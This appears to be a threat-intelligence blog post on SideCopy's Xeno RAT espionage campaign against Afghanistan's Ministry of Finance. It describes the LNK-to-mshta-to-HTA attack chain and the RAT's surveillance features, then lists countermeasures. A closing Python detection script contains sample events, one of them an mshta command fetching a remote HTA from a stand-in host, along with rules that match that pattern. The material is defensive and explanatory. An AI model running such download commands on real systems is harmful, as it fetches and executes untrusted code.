
Operation XENOFISCAL: The RAT Behind the Revenue Office

  • Javier Conejo del Cerro
  • 1 day ago
  • 3 min read

A Pakistan-linked threat actor known as SideCopy has been observed conducting a targeted espionage campaign against Afghanistan’s Ministry of Finance and other government financial entities. The operation, dubbed Operation XENOFISCAL, demonstrates a strong understanding of the target environment through the use of Pashto-language lures and infrastructure associated with Afghan organizations. The campaign continues SideCopy’s long-standing focus on South Asian government and defense-related targets, leveraging Xeno RAT to establish persistent access and conduct intelligence collection.


Phase 1: Spear-Phishing Delivery


The attack begins with a carefully crafted ZIP archive containing a malicious Windows shortcut (LNK) file. The filename is written in Pashto, the primary language used within Afghan government circles, increasing the likelihood that recipients will trust and execute the file.

The targeting extends beyond Afghanistan’s Ministry of Finance to include provincial revenue directorates, government finance employees, and other public-sector personnel responsible for managing financial operations and state revenues.


Phase 2: Remote Payload Retrieval


When executed, the malicious shortcut abuses the legitimate Windows utility mshta.exe to download a remote HTA file from a compromised Afghan educational website.

The HTA payload executes obfuscated JavaScript directly in memory, reducing forensic visibility and helping the attackers avoid traditional security controls that focus on files stored on disk.


Phase 3: Establishing Persistence


The malware establishes persistence through Windows Registry modifications while disguising itself as legitimate Microsoft Edge components.

A DLL-based loader is then used to deploy Xeno RAT while simultaneously opening a decoy document to distract the victim and reduce suspicion. This dual-action approach ensures that the victim remains focused on the displayed content while the malware silently installs in the background.


Phase 4: Full Remote Surveillance


Once active, Xeno RAT connects to a command-and-control server over TCP and provides the operators with extensive remote administration capabilities.

The malware supports:

  • Command execution

  • File upload and download

  • Screenshot capture

  • Keylogging

  • Clipboard monitoring

  • Webcam surveillance

  • Microphone monitoring

  • Scheduled-task persistence

  • SOCKS5 proxy tunneling

  • Antivirus discovery

  • DLL module execution

  • Self-removal capabilities

These features transform an infected workstation into a fully monitored espionage platform.


The Victims


The primary victims are government employees responsible for taxation, revenue collection, budgeting, and financial administration. These users possess access to sensitive economic information, government communications, policy documents, financial records, and administrative systems.

By compromising these individuals, attackers gain visibility into government operations and strategic decision-making processes, potentially supporting broader intelligence-gathering objectives.


Breach Method & Stolen Data


The attack chain relies on spear-phishing, malicious LNK files, mshta.exe abuse, HTA payload execution, obfuscated JavaScript, and Registry-based persistence mechanisms. Once Xeno RAT is deployed, attackers can access virtually any information available on the compromised system.

Potentially exposed data includes:

  • Government financial records

  • Internal communications

  • User credentials

  • Screenshots

  • Clipboard contents

  • Keystrokes

  • Files and documents

  • Network information

  • System configuration details

  • Audio and video surveillance data

The use of a compromised Afghan domain further increases the operation’s credibility while reducing suspicion among targeted users.


Measures to Fend Off the Attack


  • Block or restrict execution of LNK and HTA files where possible.

  • Monitor and alert on suspicious mshta.exe activity.

  • Deploy application allowlisting policies.

  • Disable unnecessary script execution mechanisms.

  • Audit Registry modifications related to persistence.

  • Monitor scheduled task creation.

  • Implement advanced email filtering and phishing protection.

  • Conduct security awareness training focused on spear-phishing.

  • Restrict outbound connections to unknown destinations.

  • Deploy EDR solutions capable of detecting in-memory execution.

  • Monitor for unusual TCP communications and SOCKS5 tunneling activity.

  • Apply least-privilege principles across government environments.
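Two of the measures above (alerting on suspicious mshta.exe activity and auditing Registry persistence that masquerades as Microsoft Edge) can be checked against process-creation and registry-set telemetry. The script below is an added example, not code from the original post; the Sysmon-style event shape, file paths, hostnames and SID are all constructed for illustration.

```python
import re
from typing import Dict, List, Optional

# Constructed sample events in a simplified Sysmon-like shape (event_id 1 = process
# creation, event_id 13 = registry value set). Not real telemetry from the campaign.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"event_id": "1", "image": r"C:\Windows\System32\mshta.exe",
     "command_line": r"mshta.exe https://compromised-school.example/lure.hta",
     "parent_image": r"C:\Windows\explorer.exe"},
    {"event_id": "1", "image": r"C:\Windows\System32\mshta.exe",
     "command_line": r"mshta.exe C:\Program Files\Vendor\setup.hta",
     "parent_image": r"C:\Program Files\Vendor\installer.exe"},
    {"event_id": "13", "image": r"C:\Windows\System32\rundll32.exe",
     "target_object": r"HKU\S-1-5-21-1111-2222-3333-1001\Software\Microsoft\Windows\CurrentVersion\Run\MicrosoftEdgeUpdate",
     "details": r"C:\Users\user\AppData\Roaming\EdgeCore\edgeupdate.exe"},
    {"event_id": "13", "image": r"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe",
     "target_object": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\EdgeUpdate",
     "details": r"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe"},
]

URL_RE = re.compile(r"https?://", re.IGNORECASE)
RUN_KEY_RE = re.compile(r"\\Software\\Microsoft\\Windows\\CurrentVersion\\Run(Once)?\\", re.IGNORECASE)
# Directories where genuine Edge binaries live (assumption for the example).
EDGE_DIRS = (r"c:\program files\microsoft\edge", r"c:\program files (x86)\microsoft\edge")

def flag_mshta_remote(ev: Dict[str, str]) -> Optional[str]:
    """mshta.exe launched with a URL argument: remote HTA retrieval (Phase 2)."""
    if ev.get("event_id") != "1" or not ev["image"].lower().endswith("\\mshta.exe"):
        return None
    if not URL_RE.search(ev["command_line"]):
        return None
    return "mshta.exe fetching remote HTA: " + ev["command_line"]

def flag_edge_masquerade(ev: Dict[str, str]) -> Optional[str]:
    """Run-key value named after Edge whose target lies outside the Edge install dirs (Phase 3)."""
    if ev.get("event_id") != "13" or not RUN_KEY_RE.search(ev["target_object"]):
        return None
    if "edge" not in (ev["target_object"] + " " + ev["details"]).lower():
        return None
    if ev["details"].lower().strip('"').startswith(EDGE_DIRS):
        return None
    return "Edge-named Run value pointing outside Edge install dir: " + ev["details"]

def scan(events: List[Dict[str, str]]) -> List[str]:
    """Apply both rules to every event and return the list of findings."""
    findings = []
    for ev in events:
        for rule in (flag_mshta_remote, flag_edge_masquerade):
            hit = rule(ev)
            if hit:
                findings.append(hit)
    return findings

if __name__ == "__main__":
    for line in scan(SAMPLE_EVENTS):
        print(line)
```

The legitimate installer-launched HTA and the genuine EdgeUpdate Run value are left alone, so the rules can be tuned on real telemetry without drowning in benign hits.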


Conclusions


Operation XENOFISCAL illustrates how modern espionage actors continue to combine social engineering, legitimate Windows utilities, compromised local infrastructure, and versatile remote access trojans to achieve long-term intelligence collection objectives. While none of the individual techniques are particularly novel, their careful combination, localization, and targeting demonstrate a mature operation designed to remain unnoticed while maintaining persistent access to sensitive government systems. The campaign reinforces the importance of monitoring trusted system binaries, strengthening phishing defenses, and maintaining visibility into persistence mechanisms across high-value environments.


The Hacker News

